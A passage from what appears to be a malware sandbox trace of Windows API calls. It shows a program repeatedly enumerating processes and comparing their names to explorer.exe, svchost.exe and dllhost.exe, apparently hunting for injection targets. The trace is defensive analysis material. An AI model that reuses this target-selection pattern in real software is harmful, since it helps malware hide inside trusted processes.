lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0214.087] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.087] CloseHandle (hObject=0xd8) returned 1 [0214.087] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0214.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0214.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0214.088] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.088] CloseHandle (hObject=0xd8) returned 1 [0214.088] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0214.088] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0214.088] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0214.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0214.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0214.089] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.089] CloseHandle (hObject=0xd8) returned 1 [0214.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0214.089] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.089] CloseHandle (hObject=0xd8) returned 1 [0214.090] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0214.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0214.090] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.090] CloseHandle (hObject=0xd8) returned 1 [0214.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0214.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0214.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.091] CloseHandle (hObject=0xd8) returned 1 [0214.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0214.134] CloseHandle (hObject=0xd4) returned 1 [0214.134] Sleep (dwMilliseconds=0x3e8) [0215.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0215.157] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0215.157] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0215.158] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0215.158] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0215.159] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0215.159] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0215.160] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0215.160] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0215.161] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0215.161] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0215.162] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0215.162] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0215.163] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0215.163] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0215.164] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0215.164] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0215.165] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0215.166] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0215.166] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0215.167] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.167] CloseHandle (hObject=0xd8) returned 1 [0215.167] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0215.167] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0215.167] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0215.167] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0215.167] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0215.168] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.168] CloseHandle (hObject=0xd8) returned 1 [0215.168] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0215.168] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0215.168] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0215.168] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0215.168] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0215.169] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0215.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0215.170] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.170] CloseHandle (hObject=0xd8) returned 1 [0215.170] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0215.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0215.170] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.170] CloseHandle (hObject=0xd8) returned 1 [0215.170] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0215.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0215.171] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.171] CloseHandle (hObject=0xd8) returned 1 [0215.171] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0215.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0215.171] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.171] CloseHandle (hObject=0xd8) returned 1 [0215.171] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0215.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0215.172] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.172] CloseHandle (hObject=0xd8) returned 1 [0215.172] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0215.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0215.173] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.173] CloseHandle (hObject=0xd8) returned 1 [0215.173] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0215.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0215.173] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.173] CloseHandle (hObject=0xd8) returned 1 [0215.173] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0215.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0215.174] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.174] CloseHandle (hObject=0xd8) returned 1 [0215.174] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0215.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0215.174] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.174] CloseHandle (hObject=0xd8) returned 1 [0215.174] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0215.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0215.175] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.175] CloseHandle (hObject=0xd8) returned 1 [0215.175] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0215.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0215.176] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.176] CloseHandle (hObject=0xd8) returned 1 [0215.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0215.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0215.176] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.176] CloseHandle (hObject=0xd8) returned 1 [0215.176] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0215.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0215.177] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.177] CloseHandle (hObject=0xd8) returned 1 [0215.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0215.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0215.177] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.177] CloseHandle (hObject=0xd8) returned 1 [0215.177] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0215.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0215.178] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.178] CloseHandle (hObject=0xd8) returned 1 [0215.178] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0215.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0215.179] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.179] CloseHandle (hObject=0xd8) returned 1 [0215.179] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0215.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0215.179] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.179] CloseHandle (hObject=0xd8) returned 1 [0215.180] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0215.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0215.180] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.180] CloseHandle (hObject=0xd8) returned 1 [0215.180] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0215.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0215.181] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0215.181] CloseHandle (hObject=0xd8) returned 1 [0215.181] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0215.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 